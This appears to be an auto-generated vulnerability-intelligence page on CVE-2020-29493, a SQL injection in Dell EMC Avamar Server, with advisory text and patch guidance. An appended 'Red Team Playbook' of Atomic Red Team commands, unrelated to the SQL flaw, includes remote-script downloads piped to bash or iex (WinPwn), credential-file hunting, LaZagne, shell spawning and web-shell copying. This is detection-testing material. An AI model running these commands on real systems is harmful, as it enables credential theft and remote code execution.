CVE-2020-29493
Overview
This vulnerability is a SQL Injection flaw rooted in improper sanitization of user-supplied input within the Fitness Analyzer component of Dell EMC Avamar Server. The affected feature processes SQL queries dynamically without adequate validation or parameterization, allowing crafted input to alter backend database commands. The issue specifically impacts versions 19.1, 19.2, and 19.3 of the Avamar Server product line.
Vulnerability Description
DELL EMC Avamar Server, versions 19.1, 19.2, 19.3, contain a SQL Injection Vulnerability in Fitness Analyzer. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of certain SQL commands on the application's backend database, causing unauthorized read and write access to application data. Exploitation may lead to leakage or deletion of sensitive backup data; hence the severity is Critical. Dell EMC recommends customers to upgrade at the earliest opportunity.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL commands on the backend database, enabling unauthorized reading, modification, or deletion of sensitive backup data. The attack requires only network access and no user interaction or credentials (CVSS vector AV:N/AC:L/PR:N/UI:N). This can result in significant data compromise, including leakage or destruction of critical backup information, severely impacting business continuity and data security.
Solution
Dell recommends upgrading affected Dell EMC Avamar Server installations to versions later than 19.3 as detailed in their security advisory DSA-2020-272 (https://www.dell.com/support/kbdoc/en-us/000181806/dsa-2020-272-dell-emc-avamar-server-security-update-for-multiple-vulnerabilities). Customers should apply the provided security updates promptly to remediate the SQL Injection vulnerability and associated issues. No alternative mitigations are specified beyond applying the vendor-supplied patches.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in specific versions of the DELL EMC Avamar Server and Integrated Data Protection Appliance is characterized as a SQL Injection flaw within the Fitness Analyzer component. This type of vulnerability arises when an application improperly constructs SQL queries, allowing an attacker to manipulate the input fields to execute arbitrary SQL commands. In this case, the flaw enables a remote unauthenticated attacker to inject malicious SQL code into the application’s backend database. This can lead to unauthorized access to sensitive data, including the potential for both reading and writing operations on the database, which could compromise the integrity and confidentiality of the stored information.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a specially designed request to the Fitness Analyzer interface, which, if not properly sanitized, would allow them to execute SQL commands that could extract sensitive backup data or modify existing records. For instance, an attacker could retrieve user credentials, access logs, or even delete critical backup files, leading to significant data loss. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly dangerous, as it lowers the barrier for entry for potential attackers.
The real-world impact of this vulnerability is profound, especially for organizations relying on DELL EMC products for data protection and backup solutions. The potential for data leakage or deletion poses a critical business risk, as sensitive information could be exposed to unauthorized parties, leading to compliance violations, reputational damage, and financial losses. Organizations that fail to address this vulnerability may find themselves vulnerable to data breaches, which could result in costly remediation efforts and legal ramifications. Furthermore, the loss of backup data can severely disrupt business operations, making it imperative for affected organizations to prioritize remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including penetration testing and code reviews, can help identify potential SQL injection points within the application. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests before they reach the application. It is also crucial for organizations to stay informed about security updates and patches released by DELL EMC, as timely upgrades to the latest versions of the affected products can significantly reduce the risk of exploitation. Educating development teams about secure coding practices, particularly input validation and parameterized queries, is essential to prevent similar vulnerabilities in the future.
In conclusion, the SQL Injection vulnerability in the DELL EMC Avamar Server and Integrated Data Protection Appliance represents a critical security concern that could have severe implications for organizations. The potential for unauthorized access to sensitive data, coupled with the ease of exploitation, necessitates immediate action from affected users. By adopting robust detection and mitigation strategies, organizations can safeguard their data and maintain the integrity of their backup systems, thereby reducing the risk of a successful attack.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dell | Emc Avamar Server | 19.1 |
cpe:2.3:a:dell:emc_avamar_server:19.1:*:*:*:*:*:*:*
|
|
|
Dell | Emc Avamar Server | 19.2 |
cpe:2.3:a:dell:emc_avamar_server:19.2:*:*:*:*:*:*:*
|
|
|
Dell | Emc Avamar Server | 19.3 |
cpe:2.3:a:dell:emc_avamar_server:19.3:*:*:*:*:*:*:*
|
|
|
Dell | Emc Integrated Data Protection Appliance | 2.5 |
cpe:2.3:a:dell:emc_integrated_data_protection_appliance:2.5:*:*:*:*:*:*:*
|
|
|
Dell | Emc Integrated Data Protection Appliance | 2.6 |
cpe:2.3:a:dell:emc_integrated_data_protection_appliance:2.6:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-29493 |
| dell.com |
GitHub CVE
x_refsource_MISC
|
https://www.dell.com/support/kbdoc/en-us/000181806/dsa-2020-272-dell-emc-avamar-server-security-update-for-multiple-vulnerabilities |